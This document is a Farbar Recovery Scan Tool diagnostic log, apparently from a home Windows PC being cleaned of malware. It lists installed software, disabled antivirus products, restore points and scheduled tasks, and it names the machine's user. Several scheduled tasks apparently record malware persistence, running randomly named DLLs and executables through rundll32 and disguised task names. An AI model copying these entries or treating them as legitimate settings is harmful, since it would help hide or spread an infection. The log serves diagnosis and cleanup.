2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-25 10:57
 
==================== End Of Log ============================


Addition

 


Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014

Ran by savas.kyriakidis at 2014-08-25 13:41:46

Running from F:\

Boot Mode: Normal

==========================================================

 

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}

AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}

AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}

AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

 

==================== Installed Programs ======================

 

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)

32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden

6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)

Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden

ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)

Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden

Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)

Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)

Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)

Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)

Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)

Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )

AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)

AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden

Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)

bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden

BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden

BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden

Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)

BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden

CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden

ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden

ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden

CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)

Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)

Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)

Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)

Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)

Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)

Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)

Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden

DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden

DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden

DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden

EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )

Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)

Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)

GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)

HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)

HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)

HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)

HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)

HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)

HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)

HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)

iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)

iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)

Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)

Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)

MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden

MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)

Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)

Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden

Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden

Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)

Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden

Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden

Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden

Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden

Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)

Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)

Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden

OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)

PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)

ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden

QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)

Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)

Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )

Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden

Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)

Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden

Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden

Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden

SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)

SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)

SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden

Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden

Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)

Skins (Version: 2007.0731.2234.38497 - ATI) Hidden

SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden

SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)

Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)

TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden

UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden

Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)

Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)

Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)

Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)

Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)

Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)

Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)

Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)

Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)

WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden

 

==================== Custom CLSID (selected items): ==========================

 

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

 

 

==================== Restore Points  =========================

 

29-07-2014 11:25:23 Scheduled Checkpoint

30-07-2014 11:45:57 Scheduled Checkpoint

01-08-2014 21:10:36 Scheduled Checkpoint

02-08-2014 16:42:56 Scheduled Checkpoint

04-08-2014 04:00:03 Scheduled Checkpoint

07-08-2014 22:48:19 Scheduled Checkpoint

11-08-2014 02:11:41 Scheduled Checkpoint

11-08-2014 15:01:42 Scheduled Checkpoint

12-08-2014 10:45:08 Scheduled Checkpoint

14-08-2014 02:36:25 Scheduled Checkpoint

14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59

14-08-2014 23:31:34 Advanced-System Protector

15-08-2014 23:47:04 Removed SofTest

16-08-2014 13:18:06 Removed DriverUpdate

16-08-2014 13:29:10 Removed HTC Sync.

16-08-2014 13:44:46 Removed HTC Sync.

16-08-2014 14:02:17 Removed HTC BMP USB Driver.

16-08-2014 16:47:50 Advanced-System Protector

16-08-2014 21:58:06 Installed AVG 2014

16-08-2014 22:11:41 Removed SlimCleaner Plus

16-08-2014 22:14:50 Removed HTC Driver Installer.

17-08-2014 19:56:09 Installed AVG 2014

17-08-2014 19:59:04 Installed AVG 2014

17-08-2014 20:03:04 Removed AVG 2014

17-08-2014 20:04:51 Installed AVG 2011

17-08-2014 21:08:16 Installed AVG 2014

17-08-2014 21:16:20 Installed AVG 2014

17-08-2014 21:24:43 Removed AVG 2014

17-08-2014 21:26:10 Installed AVG 2011

19-08-2014 21:04:48 Advanced-System Protector

21-08-2014 01:40:12 Advanced-System Protector

23-08-2014 20:47:11 Checkpoint by HitmanPro

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)

Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM

Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION

Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe

Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe

Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)

Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)

Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)

Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer

Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI

Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe

Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages

Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)

Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe

Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)

Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION

Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe

Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)

Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)

Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()

Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe

Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

 

==================== Loaded Modules (whitelisted) =============

 

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe

2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe

2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll

2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll

2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll

2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll

2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll

2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4

AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

